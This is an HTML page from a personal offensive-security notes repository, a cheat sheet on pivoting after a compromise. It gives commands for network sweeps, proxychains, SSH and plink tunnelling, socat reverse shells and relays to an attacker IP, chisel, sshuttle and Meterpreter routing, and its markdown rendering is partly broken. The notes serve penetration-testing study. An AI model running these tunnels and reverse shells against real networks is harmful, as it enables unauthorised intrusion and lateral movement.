stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/post exploitation/pivoting.html

519 lines
51 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#pivoting">Pivoting</a><ul>
<li><a href="#enumeration">Enumeration</a><ul>
<li><a href="#using-material-found-on-the-machine-and-preinstalled-tools">Using material found on the machine and preinstalled tools</a></li>
<li><a href="#scripting-techniques">Scripting Techniques</a></li>
</ul>
</li>
<li><a href="#tools">Tools</a><ul>
<li><a href="#proxychains-foxyproxy">Proxychains / FoxyProxy</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#add-proxy-here">add proxy here ...</a></li>
<li><a href="#meanwhile">meanwhile</a></li>
<li><a href="#defaults-set-to-tor">defaults set to "tor"</a></li>
<li><a href="#socks5-127001-1337">socks5 127.0.0.1 1337</a></li>
<li><a href="#proxy_dns">proxy_dns</a><ul>
<li><a href="#ssh-port-forwarding-and-tunnelling-primarily-unix">SSH port forwarding and tunnelling (primarily Unix)</a></li>
<li><a href="#plinkexe-windows">plink.exe (Windows)</a></li>
<li><a href="#socat">Socat</a></li>
<li><a href="#chisel">Chisel</a></li>
<li><a href="#sshuttle">sshuttle</a></li>
<li><a href="#meterpreter">Meterpreter</a><ul>
<li><a href="#meterpreter-auto-routing">Meterpreter Auto Routing</a></li>
<li><a href="#meterpreter-proxy-routing">Meterpreter Proxy Routing</a></li>
</ul>
</li>
<li><a href="#rpivot">rpivot</a></li>
<li><a href="#links">Links</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="pivoting">Pivoting</h1>
<ul>
<li>Tunnelling/Proxying</li>
<li>Port Forwarding</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<h3 id="using-material-found-on-the-machine-and-preinstalled-tools">Using material found on the machine and preinstalled tools</h3>
<ul>
<li><code>arp -a</code></li>
<li><code>/etc/hosts</code> or <code>C:\Windows\System32\drivers\etc\hosts</code></li>
<li><code>/etc/resolv.conf</code></li>
<li><code>ipconfig /all</code></li>
<li><code>nmcli dev show</code></li>
<li><a href="https://github.com/andrew-d/static-binaries.git">Statically compiled tools</a></li>
</ul>
<h3 id="scripting-techniques">Scripting Techniques</h3>
<div class="codehilite"><pre><span></span><code><span class="k">for</span> i <span class="k">in</span> <span class="o">{</span><span class="m">1</span>..255<span class="o">}</span><span class="p">;</span> <span class="k">do</span> <span class="o">(</span>ping -c <span class="m">1</span> <span class="m">192</span>.168.0.<span class="si">${</span><span class="nv">1</span><span class="si">}</span> <span class="p">|</span> grep <span class="s2">&quot;bytes from&quot;</span> <span class="p">&amp;</span><span class="o">)</span><span class="p">;</span> <span class="k">done</span>
<span class="k">for</span> i <span class="k">in</span> <span class="o">{</span><span class="m">1</span>..65535<span class="o">}</span><span class="p">;</span> <span class="k">do</span> <span class="o">(</span><span class="nb">echo</span> &gt; /dev/tcp/192.168.0.1/<span class="nv">$i</span><span class="o">)</span> &gt;/dev/null <span class="m">2</span>&gt;<span class="p">&amp;</span><span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="nv">$i</span> is open<span class="p">;</span> <span class="k">done</span>
</code></pre></div>
<ul>
<li>Using local tools through a proxy like <code>nmap</code></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li>Enumerating a network using native and statically compiled tools</li>
</ul>
<h3 id="proxychains-foxyproxy">Proxychains / FoxyProxy</h3>
<ul>
<li>In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
<code>sh
ssh &lt;username&gt;@$ATTACKER_IP -R 9050 -N</code></li>
<li>Proxychains, e.g. scan target via nmap, or connect via nc through jump server
<code>sh
proxychains nc &lt;IP&gt; &lt;PORT&gt;
proychains nmap &lt;IP&gt;
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip</code><ul>
<li>Use <code>/etc/proxychains.conf</code> or <code>./proxychains.conf</code>containing:
```sh
[ProxyList]</li>
</ul>
<h1 id="add-proxy-here">add proxy here ...</h1>
<h1 id="meanwhile">meanwhile</h1>
<h1 id="defaults-set-to-tor">defaults set to "tor"</h1>
<p>socks4 127.0.0.1 9050</p>
<h1 id="socks5-127001-1337">socks5 127.0.0.1 1337</h1>
<h1 id="proxy_dns">proxy_dns</h1>
<p>``` </p>
</li>
<li>FoxyProxy, choose proxy type, proxy IP and port in settings </li>
</ul>
<h3 id="ssh-port-forwarding-and-tunnelling-primarily-unix">SSH port forwarding and tunnelling (primarily Unix)</h3>
<ul>
<li>
<p>LocalPortForwarding
<code>sh
ssh -L $LOCAL_PORT:&lt;IP_seen_from_Jumpserver&gt;:&lt;Port_seen_from_Jumpserver&gt; &lt;user&gt;@&lt;Jumpserver&gt; -fN</code></p>
<ul>
<li>Another possibility to use the jumpserver directly on it's cli via <code>ssh &lt;username&gt;@&lt;jumpserver&gt; -L *:$LOCAL_PORT:127.0.0.1:80 -N</code>. One can connect now to the target via the jumpserver</li>
<li>Tip: open port on windows target via
<code>sh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%</code></li>
</ul>
</li>
<li>
<p>Dynamic Port Forwarding
<code>sh
ssh -D $PORT &lt;user&gt;@&lt;Jumpserver&gt; -fN</code></p>
</li>
<li>
<p>Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
<code>sh
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN</code></p>
<ul>
<li>Tip1: create a user on the attacker to receive the connection without compromising your own password</li>
<li>Tip2: use <code>-N</code> to not receive an interactive shell. The attacking user does not necessarily have one on the target</li>
</ul>
</li>
</ul>
<h3 id="plinkexe-windows">plink.exe (Windows)</h3>
<ul>
<li><a href="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html">latest version</a></li>
</ul>
<div class="codehilite"><pre><span></span><code>cmd.exe /c <span class="nb">echo</span> y <span class="p">|</span> .<span class="se">\p</span>link.exe -R &lt;LocalPort&gt;:&lt;TargetIP&gt;:&lt;TargetPort&gt; &lt;user&gt;@&lt;Jumpserver&gt; -i &lt;key&gt; -N
</code></pre></div>
<ul>
<li>Key generation
<code>sh
puttygen &lt;keyfile&gt; -o key.ppk</code></li>
<li>Circumvention, described by <a href="https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d">U.Y.</a> </li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nb">echo</span> y <span class="p">|</span> <span class="p">&amp;</span>.<span class="se">\p</span>link.exe -ssh -l &lt;MYUSERNAME&gt; -pw &lt;MYPASSWORD&gt; -R &lt;MYIP&gt;:&lt;MYPORT&gt;:127.0.0.1:&lt;TARGETPORT&gt; &lt;MYIP&gt;
</code></pre></div>
<h3 id="socat">Socat</h3>
<ul>
<li>
<p>Reverse shell on target via
<code>sh
./socat tcp-l:8000 tcp:&lt;attacker-IP&gt;:443 &amp;</code></p>
<ul>
<li>Attacking bind shell
<code>sh
sudo nc -lvnp 443</code></li>
</ul>
</li>
<li>
<p>Relay on jumpserver via
<code>sh
./socat tcp-l:33060,fork,reuseaddr tcp:&lt;TargetIP&gt;:3306 &amp;</code></p>
</li>
<li>
<p>Quiet Port Forwarding</p>
<ul>
<li>On attacker
<code>sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &amp;</code></li>
<li>On relay server
<code>sh
./socat tcp:&lt;attacker-IP&gt;:8001 tcp:&lt;TargetIP&gt;:&lt;TargetPort&gt;,fork &amp;</code></li>
<li>Open <code>localhost:8000</code></li>
</ul>
</li>
<li>
<p>Processes are backgrounded via <code>&amp;</code>. Therefore, the process can be quit by using the corresponding bg number like <code>kill %1</code>.</p>
</li>
<li>
<p>In need of a Download on target, expose a port on the attacker via relay
<code>sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80</code></p>
</li>
</ul>
<h3 id="chisel">Chisel</h3>
<ul>
<li><strong>Does not require SSH on target</strong></li>
<li>
<p>Reverse Proxy</p>
<ul>
<li>Bind port on attacker
<code>sh
./chisel server -p &lt;ListeningPort&gt; --reverse &amp;</code></li>
<li>Reverse port on target/proxy
<code>sh
./chisel client &lt;attacker-IP&gt;:&lt;attacker-Port&gt; R:socks &amp;</code></li>
<li><code>proxychains.conf</code> contains
<code>sh
[ProxyList]
socks5 127.0.0.1 &lt;Listening-Port&gt;</code></li>
</ul>
</li>
<li>
<p>Forward SOCKS Proxy</p>
<ul>
<li>Proxy/compromised machine
<code>sh
./chisel server -p &lt;Listen-Port&gt; --socks5</code></li>
<li>On attacker
<code>sh
./chisel client &lt;target-IP&gt;:&lt;target-Port&gt; &lt;proxy-Port&gt;:socks</code></li>
</ul>
</li>
<li>Remote Port Forward<ul>
<li>On attacker
<code>sh
./chisel server -p &lt;Listen-Port&gt; --reverse &amp;</code></li>
<li>On forwarder
<code>sh
./chisel client &lt;attacker-IP&gt;:&lt;attackerListen-Port&gt; R:&lt;Forwarder-Port&gt;:&lt;target-IP&gt;:&lt;target-Port&gt; &amp;</code></li>
</ul>
</li>
<li>Local Port Forwarding<ul>
<li>On proxy
<code>sh
./chisel server -p &lt;Listen-Port&gt;</code></li>
<li>On attacker
<code>sh
./chisel client &lt;Listen-IP&gt;:&lt;Listen-Port&gt; &lt;attacker-IP&gt;:&lt;target-IP&gt;:&lt;target-Port&gt;</code></li>
</ul>
</li>
</ul>
<h3 id="sshuttle">sshuttle</h3>
<ul>
<li><code>pip install sshuttle</code></li>
<li><code>sshuttle -r &lt;user&gt;@&lt;target&gt; &lt;subnet/CIDR&gt;</code></li>
<li>or automatically determined</li>
</ul>
<div class="codehilite"><pre><span></span><code>sshuttle -r &lt;user&gt;@&lt;target&gt; -N
</code></pre></div>
<ul>
<li>Key based auth</li>
</ul>
<div class="codehilite"><pre><span></span><code>sshuttle -r &lt;user&gt;@&lt;target&gt; --ssh-cmd <span class="s2">&quot;ssh -i &lt;key&gt;&quot;</span> &lt;subnet/CIDR&gt;
</code></pre></div>
<ul>
<li>Exclude servers via <code>-x</code>, for example the target/gateway server</li>
</ul>
<h3 id="meterpreter">Meterpreter</h3>
<ul>
<li>Meterpreter with payload <code>set payload linux/x64/meterpreter_reverse_tcp</code> after successful connection do</li>
</ul>
<div class="codehilite"><pre><span></span><code>portfwd add -l <span class="m">22</span> -p <span class="m">22</span> -r <span class="m">127</span>.0.0.1
</code></pre></div>
<h4 id="meterpreter-auto-routing">Meterpreter Auto Routing</h4>
<ul>
<li>Upload payload and catch it with <code>multi/handler</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>background
use post/multi/manage/autoroute
set session 1
set subnet &lt;10.0.0.0&gt;
run
</code></pre></div>
<h4 id="meterpreter-proxy-routing">Meterpreter Proxy Routing</h4>
<ul>
<li>Specify socks proxy via</li>
</ul>
<div class="codehilite"><pre><span></span><code>use auxiliary/server/socks_proxy
</code></pre></div>
<ul>
<li>Set proxychain on attacker accordingly</li>
</ul>
<h3 id="rpivot">rpivot</h3>
<ul>
<li><a href="https://github.com/klsecservices/rpivot.git">klsecservices' repo</a></li>
<li><a href="https://github.com/klsecservices/rpivot/releases/tag/v1.0">Their windows binary release</a></li>
</ul>
<h2 id="links">Links</h2>
<ul>
<li><a href="https://adepts.of0x.cc/shadowmove-hijack-socket/">Shadowmove at the adepts of 0xcc</a></li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
console.log('closed');
sessionStorage.removeItem(obj.id);
}
// if (obj.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", obj.id);
// console.log(obj);
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
}
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>